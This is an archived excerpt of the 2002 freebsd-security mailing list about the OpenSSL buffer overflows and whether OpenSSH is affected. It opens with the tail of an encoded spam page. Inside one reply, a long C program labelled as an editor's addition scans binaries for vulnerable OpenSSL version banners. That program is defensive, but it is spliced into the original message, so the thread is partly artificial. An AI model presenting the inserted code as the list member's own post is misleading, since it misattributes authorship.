b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyIFdyaXRlciBOVC8yTlQ8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5NNDUzMkdBPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 
KzE+JDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2Nl bnRlcj4NCg0KPGNlbnRlcj4NCjxwPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+Jm5ic3A7 PHU+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpDYW5ub24gQ29waWVy czogKFBhZ2UgMTApPC9mb250PjwvZm9udD48L3U+PC9mb250PjwvY2VudGVyPg0KDQo8cD48YnI+ DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIxMCUiIEJHQ09MT1I9 IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXpl PSsxPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDYvIDZSRS8gNy8gOC8g MTEvIDEyLyA2NTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0EzMCZuYnNwOzwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIj MDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ2OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K PC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQg c2l6ZT0rMT5JdGVtICMgMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlBDIDMwMC8zMjAvMzQw LzM2MCZuYnNwOyBBbGwNCjMwMCBTZXJpZXM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtFNDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRl 
cj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kODk8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9 IiMwMDAwOTkiPjxmb250IHNpemU9KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PlBDIDcwMC83MjAvNzYwJm5ic3A7IEFsbCA3MDANClNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0U0MCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ4OTwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICM0PC9mb250PjwvZm9udD48 L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+UEMgOTAwLzkxMC85MjAmbmJzcDsgQWxsIDkwMA0KU2VyaWVzPC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7RTQwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4N Cg0KPGNlbnRlcj4NCjxwPjx1Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpFcHNvbiBhbmQgUGFuYXNvbmljIFByaW50 ZXJzOihvbiBQYWdlcyA0ICZhbXA7IDcpPC9mb250PjwvZm9udD48L2ZvbnQ+PC91PjwvY2VudGVy Pg0KDQo8cD48YnI+DQo8Y2VudGVyPjx0YWJsZSBCT1JERVIgV0lEVEg9IjgwJSIgSEVJR0hUPSIx MCUiIEJHQ09MT1I9IiNGRkZGQ0MiID4NCjx0ciBCR0NPTE9SPSIjNDA4MDgwIj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+SVRFTTwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IHNpemU9KzE+Jm5ic3A7 PGZvbnQgY29sb3I9IiNGRkZGRkYiPkRFU0NSSVBUSU9OPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 
KzE+TUZHICM8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5QUklDRTwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMgMTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkVwc29uIDEwMDAvMTUwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPlMwNTEwMTEmbmJzcDs8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPkl0ZW0gIzImbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5FcHNv biBFUEw3MDAwLzgwMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5TMDUxMjAwJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDEwNSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0i IzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5JdGVtICMzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ UGFuYXNvbmljIDkwLzk1Jm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0 ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+LS0tLS0tLS0t LS0tLS0tLT48L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMTA1PC9mb250PjwvZm9udD48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj4NCjxwPjx1 Pjxmb250IHNpemU9KzM+U29ycnksPC9mb250PjwvdT48Zm9udCBzaXplPSsyPiZuYnNwOyBTdGls 
bCBubyBJbmtqZXRzLA0KYnViYmxlIGpldHMgb3IgWGVyb3ggaW4gc3RvY2s8L2ZvbnQ+DQo8YnI+ Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8YnI+Jm5ic3A7DQo8cD48dT48Yj5ESVNDTEFJTUVSUzwvYj46 PC91Pg0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IEFsbCB0cmFkZW1hcmtzLCBicmFuZCBu YW1lcyBhbmQgZGlhZ3JhbXMgbGlzdGVkDQpvciBzaG93biBhYm92ZQ0KPGJyPmFyZSBwcm9wZXJ0 eSBvZiB0aGVpciByZXNwZWN0aXZlIGhvbGRlcnMmbmJzcDsmbmJzcDsgYW5kIHVzZWQgZm9yIGRl c2NyaXB0aXZlDQpwdXJwb3NlcyBvbmx5DQo8YnI+LldlIGRvIG5vdCBjYXJyeSBhbnkgSFAgT0VN Jm5ic3A7IFByb2R1Y3RzLg0KPHA+PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+PHU+Tk9URVM8 L3U+OjwvZm9udD4NCjxwPlVuaXZlcnNpdHkgYW5kIFNjaG9vbCBQdXJjaGFzZSBvcmRlcnMgd2Vs Y29tZS4gKE5vIENyZWRpdCBhcHByb3ZhbCByZXF1aXJlZC4NCkFsbCBvdGhlciBQdXJjaGFzZQ0K PGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBvcmRlcnMgcmVxdWlyZSBjcmVkaXQgYXBwcm92YWwNCjxi cj4mbmJzcDtQYXkgYnkgY2hlY2sgKEMuTy5ELiksIENyZWRpdCBjYXJkIG9yIHB1cmNoYXNlIG9y ZGVyIChOZXQgMzANCkRheXMpDQo8YnI+U2hpcHBpbmcgY2hhcmdlcyBzdGFydCBhdCAkNC41IHBl ciBjYXJ0cmlkZ2UuIEFkZCAkMS41IGZvciBlYWNoIGFkZGl0aW9uYWwNCmNhcnRyaWRnZS4gQ2Fy dHJpZGdlcw0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBkZWxpdmVyZWQgYnkgRmVkZXJhbCBFeHBy ZXNzIHdpdGhpbiAyIHRvIDUgd29ya2luZw0KZGF5cyBkZXBlbmRpbmcgb24geW91ciBsb2NhdGlv bi4NCjxicj5TaGlwcGluZyBhbmQgYmlsbGluZyBhZGRyZXNzZXMgYXJlIHJlcXVpcmVkIGZvciBQ dXJjaGFzZSBPcmRlciB0cmFuc2FjdGlvbnMuDQpZb3VyIGludm9pY2Ugd2lsbA0KPGJyPiZuYnNw OyZuYnNwOyZuYnNwOyBiZSBhdHRhY2hlZCB0byB5b3VyIHBhY2thZ2luZy4gUGxlYXNlIHBlYWwg YW5kIHBheQ0Kd2l0aGluIDMwIGRheXMuDQo8YnI+MzAgZGF5IHN0YW5kYXJkIHJldHVybiBwb2xp Y3kgKG1vbmV5IGJhY2sgZ3VhcmFudGVlKSBvbiBhbGwgbWVyY2hhbmRpc2UuDQo5MCBkYXkgdW5s aW1pdGVkIGV4Y2hhbmdlIHBvbGljeQ0KPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyBmb3IgZGVmZWN0 aXZlIG1lcmNoYW5kaXNlPGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+LjwvZm9udD4NCjxwPjxi Pjx1PkVYQ0xVU0lPTlM6PC91PjwvYj4NCjxwPjx1PldlIGRvIG5vdCBjYXJyeTo8L3U+DQo8cD4m bmJzcDsmbmJzcDsmbmJzcDsgLSBYZXJveCwgQnJvdGhlciwgUGFuYXNvbmljLCBvciBGdWppdHN1 IFByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7IC0gRGVza2pldC9JbmtqZXQgb3IgQnVi 
YmxlamV0IHByb2R1Y3RzDQo8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IC1BbnkgT2ZmYnJh bmRzIGJlc2lkZXMgdGhlIG9uZXMgbGlzdGVkIGFib3ZlLg0KQWxsIGNhcnRyaWRnZXMNCjxicj4m bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgYXJl IGNvbXBhdGlibGUNCmhpZ2ggeWllbGQgcHJvZHVjDQo8YnI+PGZvbnQgZmFjZT0iQnJ1c2hTY3Jp cHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+ PC9mb250PiZuYnNwOzxmb250IA0KZmFjZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIj RkY2NjY2Ij48Zm9udCBzaXplPSs0PjwvZm9udD48L2ZvbnQ+PC9mb250Pg0KPHA+PGZvbnQgZmFj ZT0iQnJ1c2hTY3JpcHQgQlQiPjxmb250IGNvbG9yPSIjRkY2NjY2Ij48Zm9udCBzaXplPSs0Pkhh dmUNCmEgZ3JlYXQgZGF5ISE8L2ZvbnQ+PC9mb250PjwvZm9udD48L2NlbnRlcj4NCg0KPHA+PGJy Pg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0K PGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZu YnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJy PiZuYnNwOw0KPGJyPiZuYnNwOw0KPGJyPiZuYnNwOw0KPGRsPg0KPGR0Pg0KPC9kdD4NCjwvZGw+ DQoNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4m bmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxicj4mbmJzcDsNCjxi cj4mbmJzcDsNCjwvYm9keT4NCjwvaHRtbD4NCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 2:26:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 42DA237B405 for ; Wed, 31 Jul 2002 02:24:16 -0700 (PDT) Received: from ady.warpnet.ro (ady.warpnet.ro [217.156.25.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 74D6C43E70 for ; Wed, 31 Jul 2002 02:24:14 -0700 (PDT) (envelope-from ady@freebsd.ady.ro) 
Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id MAA59458 for ; Wed, 31 Jul 2002 12:24:12 +0300 (EEST) (envelope-from ady@freebsd.ady.ro)
Date: Wed, 31 Jul 2002 12:24:11 +0300 (EEST)
From: Adrian Penisoara
X-Sender: ady@ady.warpnet.ro
To: freebsd-security@freebsd.org
Subject: Are OpenSSL bugs related to OpenSSH ?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi,

Though I think that the recent OpenSSL buffer overflows don't imply that OpenSSH is vulnerable, could someone please confirm this ?

Thank you,
Ady (@freebsd.ady.ro)

____________________________________________________________________
| An age is called Dark not because the light fails to shine, but  |
| because people refuse to see it.                                 |
|                                    -- James Michener, "Space"    |

From owner-freebsd-security Wed Jul 31 3:41:31 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C93237B400; Wed, 31 Jul 2002 03:41:27 -0700 (PDT)
Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id B7D3643E4A; Wed, 31 Jul 2002 03:41:26 -0700 (PDT) (envelope-from minter@lunenburg.org)
Received: (from root@localhost) by bunning.skiltech.com (8.12.3/8.12.3) id g6VAfPar083692; Wed, 31 Jul 2002 06:41:25 -0400 (EDT) (envelope-from minter@lunenburg.org)
Received: from dundas.lunenburg.org (rdu162-234-201.nc.rr.com [24.162.234.201]) (authenticated bits=0) by bunning.skiltech.com (8.12.3/8.12.3) with ESMTP id g6VAfK04083675 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 31 Jul 2002 06:41:22 -0400
(EDT) (envelope-from minter@lunenburg.org)
Date: Wed, 31 Jul 2002 06:41:20 -0400
Subject: Re: OpenSSL workaround
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v482)
Cc: security@freebsd.org
To: "Jacques A. Vidrine"
From: "H. Wade Minter"
In-Reply-To: <20020731032131.GB38906@madman.nectar.cc>
Message-Id: <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org>
Content-Transfer-Encoding: 7bit
X-Mailer: Apple Mail (2.482)
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Tuesday, July 30, 2002, at 11:21 PM, Jacques A. Vidrine wrote:

> On Tue, Jul 30, 2002 at 10:13:05PM -0400, H. Wade Minter wrote:
>> I saw that openssl got committed to RELENG_4_6 today, but haven't
>> seen a security announcement go by. What's the recommended way to patch this
>> openssl hole?
>
> You can cvsup to RELENG_4_6.
>
> I probably won't send out the announcement until I've finished with
> RELENG_4_5 and RELENG_4_4, and that won't be tonight. For various
> reasons, merging and testing the upgrade is time consuming.

I knew I should have been clearer. :-) I cvsup'd to RELENG_4_6, but am curious about the steps to fix the problem after that. There's no standard Makefile in /usr/src/crypto/openssl/ - do I do the normal "make depend install" procedure on Makefile.org or Makefile.ssl instead?
--Wade

From owner-freebsd-security Wed Jul 31 4: 3:24 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C02E137B400 for ; Wed, 31 Jul 2002 04:03:22 -0700 (PDT)
Received: from office.advantage-interactive.com (host217-37-74-237.in-addr.btopenworld.com [217.37.74.237]) by mx1.FreeBSD.org (Postfix) with ESMTP id D4F5E43E31 for ; Wed, 31 Jul 2002 04:03:16 -0700 (PDT) (envelope-from simond@irrelevant.org)
Received: from devbox.advantage-interactive.com ([192.168.254.128]) by office.advantage-interactive.com with esmtp (Exim 3.36 #1) id 17ZrFe-00009X-00; Wed, 31 Jul 2002 12:02:46 +0100
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
From: Simon Dick
To: Adrian Penisoara
Cc: freebsd-security@freebsd.org
In-Reply-To:
References:
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Evolution/1.0.2
Date: 31 Jul 2002 12:02:45 +0100
Message-Id: <1028113366.1406.0.camel@linux>
Mime-Version: 1.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote:
> Hi,
>
> Though I think that the recent OpenSSL buffer overflows don't imply
> that OpenSSH is vulnerable, could someone please confirm this ?

OpenSSH is linked against OpenSSL, so it's a possibility that it could be vulnerable, but unless you have ssh statically linked then updating your openssl version will fix any problems.
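A way to check the statically linked case Simon mentions, as an added example (editor's code, not anything posted in this thread and not OpenSSH, OpenSSL or FreeBSD code): OpenSSL compiles its version text, of the form "OpenSSL 0.9.6a 5 Apr 2001", into libcrypto. A program linked statically carries that banner in its own image; a dynamically linked program carries none, and the library it actually loads (ldd shows which) has to be scanned instead. The program below scans a file for the banner and compares it with 0.9.6e, assumed here as the cut-off because it is the 0.9.6 release that carries the overflow fixes; the sample bytes in main() are constructed. One caveat: the banner lives in the object that implements SSLeay_version(3), and a static link pulls that object in only if the program references the symbol (OpenSSH does, since it compares library versions at start-up), so "no banner" is not proof of "no OpenSSL".

```c
/* openssl_banner.c: find the version banner that OpenSSL compiles into
 * libcrypto and decide whether it predates the fixed release. Added example
 * for this thread; the 0.9.6e cut-off is assumed from the fix discussed here
 * and the bytes used in main() are constructed, not taken from a real file. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char PREFIX[] = "OpenSSL ";  /* as in "OpenSSL 0.9.6a 5 Apr 2001" */

/* Copy the first banner found in buf[0..len) into out, NUL-terminated.
 * Returns 1 when a banner was found, 0 otherwise. */
int find_openssl_banner(const unsigned char *buf, size_t len,
                        char *out, size_t outlen)
{
    size_t plen = strlen(PREFIX);
    for (size_t i = 0; i + plen < len; i++) {
        /* the word must be followed by a digit: skips "OpenSSL Project" etc. */
        if (memcmp(buf + i, PREFIX, plen) != 0 || !isdigit(buf[i + plen]))
            continue;
        size_t n = 0;
        while (i < len && buf[i] >= 0x20 && buf[i] < 0x7f && n + 1 < outlen)
            out[n++] = (char)buf[i++];
        out[n] = '\0';
        return 1;
    }
    return 0;
}

/* Split "OpenSSL 0.9.6a ..." (prefix optional) into its fields. letter is
 * 0 when the release has none, as in "0.9.6". Returns 1 on success. */
int parse_openssl_version(const char *s, int *maj, int *min, int *pat,
                          char *letter)
{
    if (strncmp(s, PREFIX, strlen(PREFIX)) == 0)
        s += strlen(PREFIX);
    int n = 0;
    if (sscanf(s, "%d.%d.%d%n", maj, min, pat, &n) != 3)
        return 0;
    *letter = islower((unsigned char)s[n]) ? s[n] : 0;
    return 1;
}

/* 1: a 0.9.6 release older than 0.9.6e, so whatever carries it must be
 * rebuilt and restarted. 0: 0.9.6e or later. -1: not a 0.9.6 banner at all
 * (a 0.9.7 pre-release, say), to be judged by hand. */
int banner_is_vulnerable(const char *banner)
{
    int maj, min, pat;
    char letter;
    if (!parse_openssl_version(banner, &maj, &min, &pat, &letter))
        return -1;
    if (maj != 0 || min != 9 || pat != 6)
        return -1;
    return letter < 'e';
}

/* Read a file whole and classify it as above; -2 if it cannot be read,
 * -1 if no 0.9.6 banner is present. The banner found is left in out. */
int scan_file(const char *path, char *out, size_t outlen)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -2;
    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return -2; }
    long sz = ftell(f);
    if (sz < 0) { fclose(f); return -2; }
    rewind(f);
    unsigned char *buf = malloc(sz > 0 ? (size_t)sz : 1);
    if (buf == NULL) { fclose(f); return -2; }
    size_t got = fread(buf, 1, (size_t)sz, f);
    fclose(f);
    int rc = find_openssl_banner(buf, got, out, outlen)
                 ? banner_is_vulnerable(out) : -1;
    free(buf);
    return rc;
}

int main(int argc, char **argv)
{
    char banner[128];
    if (argc < 2) {
        /* constructed sample: an ELF-looking blob carrying a stale banner */
        const unsigned char sample[] =
            "\x7f" "ELF\0\0\0junk\0OpenSSL 0.9.6a 5 Apr 2001\0more";
        find_openssl_banner(sample, sizeof sample, banner, sizeof banner);
        printf("%s -> %d\n", banner, banner_is_vulnerable(banner));
        return 0;
    }
    for (int i = 1; i < argc; i++) {
        int rc = scan_file(argv[i], banner, sizeof banner);
        const char *status = rc == 1 ? "VULNERABLE, rebuild" :
                             rc == 0 ? "fixed build" :
                             rc == -1 ? "no 0.9.6 banner" : "unreadable";
        printf("%s: %s%s%s\n", argv[i], status,
               rc >= 0 ? ", " : "", rc >= 0 ? banner : "");
    }
    return 0;
}
```

Run it over the binaries and libraries that matter, for instance `./openssl_banner /usr/sbin/sshd /usr/lib/libcrypto.so.* /usr/local/lib/libcrypto.so.*`. A program that reports "no 0.9.6 banner" but that ldd shows loading a libcrypto the upgrade did not replace needs a rebuild just the same, and a running daemon keeps the old library mapped until it is restarted.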
--
Simon Dick
simond@irrelevant.org

From owner-freebsd-security Wed Jul 31 4:27:39 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4575337B400 for ; Wed, 31 Jul 2002 04:27:37 -0700 (PDT)
Received: from mail.wsf.at (MAIL.WSF.AT [212.16.37.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2368243E72 for ; Wed, 31 Jul 2002 04:27:36 -0700 (PDT) (envelope-from net@wsf.at)
Received: (from root@localhost) by mail.wsf.at (8.11.6/8.9.3) id g6VBRX798842 for freebsd-security@FreeBSD.ORG.KAV; Wed, 31 Jul 2002 13:27:33 +0200 (CEST) (envelope-from net@wsf.at)
